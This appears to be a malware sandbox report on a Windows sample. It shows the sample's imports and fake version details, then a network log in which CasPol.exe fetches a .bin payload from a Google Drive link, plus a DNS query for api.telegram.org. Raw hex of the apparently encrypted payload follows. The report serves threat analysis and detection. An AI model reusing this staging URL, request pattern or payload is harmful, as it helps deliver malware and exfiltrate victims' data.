                                                USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                DescriptionData
                                                LegalCopyrightSchenklensc
                                                FileVersion24.1.20
                                                CompanyNameLipoclasisbi233
                                                LegalTrademarksTheophilanthro36
                                                CommentsNoteform
                                                ProductNameBeignetdeje162
                                                FileDescriptionGuatemalan
                                                Translation0x0409 0x04b0
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSource PortDest PortSource IPDest IP
                                                May 12, 2022 17:08:06.985682964 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:06.985697031 CEST44349750216.58.212.142192.168.11.20
                                                May 12, 2022 17:08:06.985865116 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:07.000713110 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:07.000720978 CEST44349750216.58.212.142192.168.11.20
                                                May 12, 2022 17:08:07.052258968 CEST44349750216.58.212.142192.168.11.20
                                                May 12, 2022 17:08:07.052530050 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:07.055279970 CEST44349750216.58.212.142192.168.11.20
                                                May 12, 2022 17:08:07.055516005 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:07.173767090 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:07.173855066 CEST44349750216.58.212.142192.168.11.20
                                                May 12, 2022 17:08:07.174623013 CEST44349750216.58.212.142192.168.11.20
                                                May 12, 2022 17:08:07.174813986 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:07.179724932 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:07.222650051 CEST44349750216.58.212.142192.168.11.20
                                                May 12, 2022 17:08:07.555120945 CEST44349750216.58.212.142192.168.11.20
                                                May 12, 2022 17:08:07.555285931 CEST44349750216.58.212.142192.168.11.20
                                                May 12, 2022 17:08:07.555357933 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:07.555440903 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:07.556870937 CEST49750443192.168.11.20216.58.212.142
                                                May 12, 2022 17:08:07.556922913 CEST44349750216.58.212.142192.168.11.20
                                                May 12, 2022 17:08:07.729964972 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.730045080 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.730211973 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.730851889 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.730914116 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.783987999 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.784248114 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.785986900 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.786232948 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.792088985 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.792126894 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.792494059 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.792654991 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.792931080 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.834543943 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.994059086 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.994314909 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.994376898 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.994415998 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.994653940 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.994882107 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.995098114 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.996326923 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.996593952 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.996649981 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.996895075 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.996951103 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.997155905 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:07.997199059 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:07.997450113 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.001679897 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.001920938 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.001945019 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.001979113 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.002129078 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.002161026 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.002183914 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.002355099 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.002687931 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.002943039 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.002999067 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.003235102 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.003407955 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.003659964 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.003715992 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.003926992 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.004195929 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.004405975 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.004451990 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.004652977 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.004772902 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.005026102 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.005067110 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.005208969 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.005376101 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.005584002 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.005623102 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.005816936 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.005971909 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.006176949 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.006216049 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.006413937 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.006438971 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.006684065 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.007102966 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.007311106 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.007359982 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.007590055 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.007638931 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.007838011 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.007927895 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.008131981 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.008173943 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.008371115 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.008405924 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.008605003 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.008657932 CEST49751443192.168.11.20142.250.186.33
                                                May 12, 2022 17:08:08.008683920 CEST44349751142.250.186.33192.168.11.20
                                                May 12, 2022 17:08:08.008878946 CEST49751443192.168.11.20142.250.186.33
                                                TimestampSource PortDest PortSource IPDest IP
                                                May 12, 2022 17:08:06.964818954 CEST5188253192.168.11.201.1.1.1
                                                May 12, 2022 17:08:06.972877979 CEST53518821.1.1.1192.168.11.20
                                                May 12, 2022 17:08:07.681979895 CEST5007153192.168.11.201.1.1.1
                                                May 12, 2022 17:08:07.727734089 CEST53500711.1.1.1192.168.11.20
                                                May 12, 2022 17:08:21.281043053 CEST5791153192.168.11.201.1.1.1
                                                May 12, 2022 17:08:21.289874077 CEST53579111.1.1.1192.168.11.20
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                May 12, 2022 17:08:06.964818954 CEST192.168.11.201.1.1.10x59c7Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                May 12, 2022 17:08:07.681979895 CEST192.168.11.201.1.1.10xf6b5Standard query (0)doc-04-bk-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                May 12, 2022 17:08:21.281043053 CEST192.168.11.201.1.1.10xf8e8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                May 12, 2022 17:08:06.972877979 CEST1.1.1.1192.168.11.200x59c7No error (0)drive.google.com216.58.212.142A (IP address)IN (0x0001)
                                                May 12, 2022 17:08:07.727734089 CEST1.1.1.1192.168.11.200xf6b5No error (0)doc-04-bk-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                May 12, 2022 17:08:07.727734089 CEST1.1.1.1192.168.11.200xf6b5No error (0)googlehosted.l.googleusercontent.com142.250.186.33A (IP address)IN (0x0001)
                                                May 12, 2022 17:08:21.289874077 CEST1.1.1.1192.168.11.200xf8e8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)
                                                • drive.google.com
                                                • doc-04-bk-docs.googleusercontent.com
                                                • api.telegram.org
                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.11.2049750216.58.212.142443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-05-12 15:08:07 UTC0OUTGET /uc?export=download&id=1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Host: drive.google.com
                                                Cache-Control: no-cache
                                                2022-05-12 15:08:07 UTC0INHTTP/1.1 303 See Other
                                                Content-Type: application/binary
                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                Pragma: no-cache
                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                Date: Thu, 12 May 2022 15:08:07 GMT
                                                Location: https://doc-04-bk-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3q810s3jc95onm7rbud0rh2kvsckdceb/1652368050000/02385140022842422686/*/1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB?e=download
                                                Strict-Transport-Security: max-age=31536000
                                                Content-Security-Policy: script-src 'nonce-J5RWYexcJec3enHjZXc58A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                Cross-Origin-Opener-Policy: same-origin
                                                Server: ESF
                                                Content-Length: 0
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                X-Content-Type-Options: nosniff
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.11.2049751142.250.186.33443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-05-12 15:08:07 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3q810s3jc95onm7rbud0rh2kvsckdceb/1652368050000/02385140022842422686/*/1o9xcx-d3Bxjd3qTkG604DI9J3fWxwqqB?e=download HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Cache-Control: no-cache
                                                Host: doc-04-bk-docs.googleusercontent.com
                                                Connection: Keep-Alive
                                                2022-05-12 15:08:07 UTC1INHTTP/1.1 200 OK
                                                X-GUploader-UploadID: ADPycdu1lSaDGpo0fYKIerPollPxjNt_z9RvrVJL2b66or6pKK6d7ZmYk-553gH_q1TmxGyeipp7cxHF5bCZhMg8QDUlDdHsgwTK
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: false
                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                Access-Control-Allow-Methods: GET,OPTIONS
                                                Content-Type: application/octet-stream
                                                Content-Disposition: attachment;filename="senorita_aVQRBwgA228.bin";filename*=UTF-8''senorita_aVQRBwgA228.bin
                                                Content-Length: 216128
                                                Date: Thu, 12 May 2022 15:08:07 GMT
                                                Expires: Thu, 12 May 2022 15:08:07 GMT
                                                Cache-Control: private, max-age=0
                                                X-Goog-Hash: crc32c=ftDVBw==
                                                Server: UploadServer
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                Connection: close
                                                2022-05-12 15:08:07 UTC5INData Raw: 77 ed 55 ed ab b6 15 73 53 a8 d6 b6 74 a1 f1 9c d9 59 b0 23 99 3e f7 87 b3 f6 ee 8a b5 fa 4b 22 7c 49 3e 02 a2 49 b2 0d d6 95 96 91 1b dc 71 c4 bc 12 ee 82 d9 65 b1 4b 66 09 0f 64 90 fe 86 0c 16 9e ad fb 71 75 c2 bb 90 49 46 ca 35 85 a9 e3 53 d9 6a 38 71 fd a3 ea 1b 49 c1 de 4d b2 91 56 e4 15 d8 38 01 8e 25 9b 7a dc 62 49 8e 19 ff 8a c1 eb 0a 63 ec c8 6c b1 27 5e eb d7 a0 cf 46 f7 0e bc dd 63 ac b3 cd 68 52 84 1b 62 b2 d3 59 38 91 a2 f5 8c 8b b7 cb 27 8f dd 65 5a 32 a9 00 9d 48 24 21 e6 ca ca 1e 9c 22 fe de 7b 47 86 cf fe 4c 35 b1 a9 9d 8e 47 cb e9 de cf bc 4e e4 b3 7a 1f 0d 32 5b f8 96 ad 6b 4a 34 a7 0c 2d 24 11 a6 8b bb 4a 6c c1 bc 35 75 eb a1 eb 51 f3 54 c8 80 25 6c 55 4f 81 8f 9d b0 4c 8b 8f 8b fe 44 b1 48 c7 84 d5 a8 53 e7 70 ca 9f 70 b4 3b e4 d5 16
                                                Data Ascii: wUsStY#>K"|I>IqeKfdquIF5Sj8qIMV8%zbIcl'^FchRbY8'eZ2H$!"{GL5GNz2[kJ4-$Jl5uQT%lUOLDHSpp;
                                                2022-05-12 15:08:07 UTC9INData Raw: 0b 81 3e 34 ab c2 06 56 28 b0 13 2e 4a 2b 87 3b db 0c 38 6f 0f 72 10 56 3d e8 72 bd 13 39 bc 10 c5 3f 6a 8e 6c 14 84 2d 2b b0 62 34 a4 77 2e b8 d8 f8 44 87 d7 32 7a 0f f4 42 ab 66 8e 24 f1 0f fe 1d d4 22 4c 5e 27 8a 86 0f a2 fc 7d 8e 04 19 7e 0c 42 d6 6f 36 b0 92 1e 17 37 e2 cd 45 d9 df 8a 93 3d f0 78 34 0b b7 45 91 b1 d4 12 59 c4 3b d3 59 75 c2 bd bc 3d 44 ca cc 52 81 e3 eb df b4 58 59 d0 a3 ea 51 4f dc 53 55 b2 91 57 e8 1d ce 46 1c 8e 25 9f d8 d4 75 61 fb 1b ff 8c 63 e3 12 4b a7 c8 6c bb 2c 4c ea a9 3a cf 46 f3 28 ef 67 6d a6 a5 cc bc 5b 4a 18 2e 79 50 05 4a 86 cc d5 fc fd 7a a4 4e ec 12 4d 25 2d da 6e f2 38 a6 4b ab a7 b8 6b f8 2a c4 b0 5b 09 e1 b2 de 21 50 0b cc 99 c2 56 c1 cd de cf bc 4e f4 b3 7a 4f 27 30 5b b4 e8 ac 6b fb 93 dc 6e 2d 39 11 a6 8a a8
                                                Data Ascii: >4V(.J+;8orV=r9?jl-+b4w.D2zBf$"L^'}~Bo67E=x4EY;Yu=DRXYQOSUWF%uacKl,L:F(gm[J.yPJzNM%-n8Kk*[!PVNzO'0[kn-9
                                                2022-05-12 15:08:07 UTC13INData Raw: e2 db fa fc d7 1e b4 b3 63 8a 8c d9 08 6a b4 ca 09 a1 bc 7b c3 49 e2 4b 40 6b 4d 7a 5d bb 1c e7 61 6e 49 ae 4a ed 79 82 9e ea 35 70 e0 7a 87 16 70 ba ca 24 f4 59 b2 15 47 12 00 87 31 cc 2c 5b 02 64 74 38 74 2c e0 5c d2 3b 78 b6 7f a5 17 3b 84 7d 16 c3 74 2b b0 6e 25 8a 7c 8a ba d2 91 1a 89 d2 57 a0 13 f4 48 c0 eb d1 26 fb 1a c2 7f 9f 33 5e 5e cb 8a 86 0f a2 79 7f 8e 08 22 39 1d 44 db 72 23 3f 0d 1b 61 37 e4 ef 01 c8 d3 8e be 5c fe 17 9a 23 f9 4f b9 12 fc 61 51 d7 37 d3 23 75 c2 b1 85 43 29 98 ca 7a a3 f0 e0 c8 6c 29 7a eb b2 e1 d5 fe ae aa 4d b2 9b 47 f0 7a 72 38 01 84 08 35 a4 ca 73 5d fb 20 ff 8a c0 c7 06 72 f8 bd 55 b1 27 5f 84 8a 20 cf 4c 2b 11 a5 60 7b ab 89 73 ca 07 3c 1a 24 57 57 0f 50 fe c2 d0 ed fc dd af 5b ea 98 ee 39 53 cd 63 da 6d 04 43 89 e3
                                                Data Ascii: cj{IK@kMz]anIJy5pzp$YG1,[dt8t,\;x;}t+n%|WH&3^^y"9Dr#?a7\#OaQ7#uC)zl)zMGzr85s] rU'_ L+`{s<$WWP[9ScmC
                                                2022-05-12 15:08:07 UTC16INData Raw: 52 cd 65 67 ca 4f 74 e0 e2 c4 d3 db 9a e7 8a 7a 68 43 13 be f4 32 b7 99 f6 bb 39 d2 c0 ce 7f f5 96 0f 0d 60 62 76 2f c2 7a 13 80 59 c8 e0 cb c4 d2 87 1e b2 9a e7 9b 88 c7 73 2e a3 e2 9e aa be 59 a3 5d ca 87 36 57 4b 6c d1 af 14 f6 68 52 fe b8 62 73 7f aa b7 fe 1d b1 8d 0b 81 01 f7 ac c2 0c 7f 48 b6 02 2c 74 17 0b 69 dd 24 4d cf 1e 70 2c 6a 2b ff 5c 26 3b 78 b6 17 db 3f fd 8c 6c 18 ba 8a 2c b0 64 37 98 40 3a 90 4a 97 16 8d c3 10 c8 11 f4 44 b8 c3 d6 26 f1 08 c5 50 c7 26 5c 26 e1 d8 86 05 8b 7c 6e 8a 16 25 23 1b 6a 41 64 24 bb bd 60 3d fa e6 e5 0f cf 52 87 bb 4d f3 6c 26 37 ee 6d 0d bb fc 6b 7d ef 67 fc 66 5d 0c b9 94 4f 50 47 cd 7a a9 e2 ff cd 7e 10 e9 fd a3 e0 4f 61 0e dc 4d b4 87 db e3 15 d8 39 15 9a 31 b3 e2 dc 62 43 a6 08 ff 8a cb e7 02 77 c4 18 6e b1
                                                Data Ascii: RegOtzhC29`bv/zYs.Y]6WKlhRbsH,ti$Mp,j+\&;x?l,d7@:JD&P&\&|n%#jAd$`=RMl&7mk}gf]OPGz~OaM91bCwn
                                                2022-05-12 15:08:07 UTC17INData Raw: e3 06 43 85 48 a9 7a e6 16 83 98 c3 03 c9 96 ca 09 ba d7 cc b5 94 c7 c6 cd de ce af 5c f5 a1 6c 67 97 30 5b b2 35 bf 79 ef e7 c8 46 b5 24 11 ac a3 aa 4a 6c 2b af 3b 62 f3 ab f1 5d e7 3c 16 82 25 60 4d c2 86 8f 9d b1 b1 c7 9d 99 e8 4c 6e 4a c7 82 77 b9 41 f0 18 30 9e 50 b2 99 f5 c5 02 6d ea 99 f3 cd ea db c5 65 61 01 90 b5 98 39 fc f6 27 6f 27 ed 07 be 86 dd 3b 47 0d 30 f3 44 60 99 a8 e3 8f c3 6f eb 35 e2 dc aa b6 ac 35 08 62 7c e1 85 b1 cb 39 3e 69 22 af e6 14 33 33 4a e5 e8 c7 39 da fd 17 35 84 47 d6 c4 d0 0d 41 ed f6 92 44 88 b8 ea d6 c1 1a 44 1c 6a 91 f2 30 e4 20 df 51 02 26 36 ce d0 6c 47 09 c8 88 b4 fd 15 b4 1b 03 f4 2d d6 9c dc d7 f4 a4 29 55 b3 42 f4 93 a6 e9 a7 15 fb 9a 19 a0 9a 4f 92 09 e3 70 82 a5 e2 f7 d0 40 c3 87 38 af bb 38 2d 88 93 9d 45 58
                                                Data Ascii: CHz\lg0[5yF$Jl+;b]<%`MLnJwA0Pmea9'o';G0D`o55b|9>i"33J95GADDj0 Q&6lG-)UBOp@88-EX
                                                2022-05-12 15:08:07 UTC19INData Raw: 5a 38 b4 cc 10 ae 96 b5 a6 49 e4 50 3c 46 49 52 7a a8 14 fc 43 46 ea ac 0b f7 7f aa bf ea 35 7a 36 0b 87 16 73 a9 c2 0c bc 59 b2 13 39 62 00 87 3b dd 24 4c 7e 3f 77 38 3e 3d e8 74 b3 3b 78 ad 06 c4 3c 20 8e 6b 09 52 06 07 b2 7c 3d 8c 53 38 46 d3 bb 14 90 dc 38 03 0b 0a 43 83 4c fa 24 da ea d5 42 d5 ac fd 19 97 8a 86 0f a2 97 7d 8e 04 4f 07 0c 42 d6 0b 6e b1 ba 7e 7a e4 e4 e5 03 f3 a9 f3 f2 4d f2 7e 1a 63 f9 45 97 af 7c 51 5b c4 39 ef f2 44 c2 bb 90 5d c6 f8 ca 7a ad c9 eb d9 79 08 73 fd 84 ea 5b 49 ea de 4d a3 87 5d cf 0e d8 3f 16 70 24 b7 78 c4 69 49 89 0f 01 8b ed e9 1d 68 ec cf 74 4f 26 72 e9 fc 22 e4 a5 89 2c a3 67 69 86 07 d7 95 71 3c 91 2e 7f f2 21 50 f8 c0 c3 f7 c1 a6 ac 55 ee b0 42 2e ad c6 42 f0 24 0f 43 84 f2 46 6a de 0d 83 4e 5d 44 c9 9c d8 52
                                                Data Ascii: Z8IP<FIRzCF5z6sY9b;$L~?w8>=t;x< kR|=S8F8CL$B}OBn~zM~cE|Q[9D]zys[IM]?p$xiIhtO&r",giq<.!PUB.B$CFjN]DR
